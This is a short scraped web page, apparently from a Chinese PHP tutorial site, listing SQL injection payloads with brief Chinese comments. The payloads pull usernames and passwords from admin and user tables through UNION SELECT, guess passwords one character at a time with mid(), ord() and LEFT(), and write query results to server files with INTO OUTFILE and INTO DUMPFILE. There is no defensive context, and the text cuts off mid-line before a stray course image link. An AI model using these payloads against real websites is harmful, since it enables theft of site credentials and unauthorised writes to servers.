<script>ec(2);</script>
''%23
'' and passWord=''mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
'' and LENGTH(password)=''6(探测密码长度)
'' and LEFT(password,1)=''m
'' and LEFT(password,2)=''my
…………………………依次类推
'' union select 1,username,password from user/*
'' union select 1,username,password from user/*
='' union select 1,username,password from user/* (可以是1或者=后直接跟)
99999'' union select 1,username,password from user/*
'' into outfile ''c:/file.txt (导出文件)
='' or 1=1 into outfile ''c:/file.txt
1'' union select 1,username,password from user into outfile ''c:/user.txt
select password FROM admins where login=''John'' INTO DUMPFILE ''/path/to/site/file.txt''
id='' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
select * FROM table where 1=1
select * FROM table where ''uuu''=''uuu''
select * FROM table where 12
select * FROM&nbs
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
